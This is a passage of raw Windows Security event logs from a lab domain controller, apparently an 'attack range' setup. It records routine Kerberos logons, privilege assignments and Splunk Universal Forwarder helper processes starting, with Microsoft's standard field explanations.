Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 65003
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:59:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265133
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8C3067
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:59:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265132
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19c4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:59:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265145
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x138c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:59:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265146
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x74c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:59:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265148
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xa28
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:59:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265147
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x10f8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:59:19 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265149
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8C325A
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:59:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265152
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8C6061
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:59:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265151
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8C6061
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 65016
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:59:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265150
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8C6061
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 04:00:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265153
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a20
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:00:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265155
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1474
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:00:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265154
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14c4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:00:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265156
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf08
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:00:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265157
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x5f4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:00:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265159
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x38c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:00:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265158
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x11f8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:00:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265162
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8C991F
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 04:00:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265161
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8C991F
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 65029
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 04:00:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265160
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8C991F
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 04:01:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265163
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14f0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:01:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265165
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf44
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:01:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265164
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x258
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
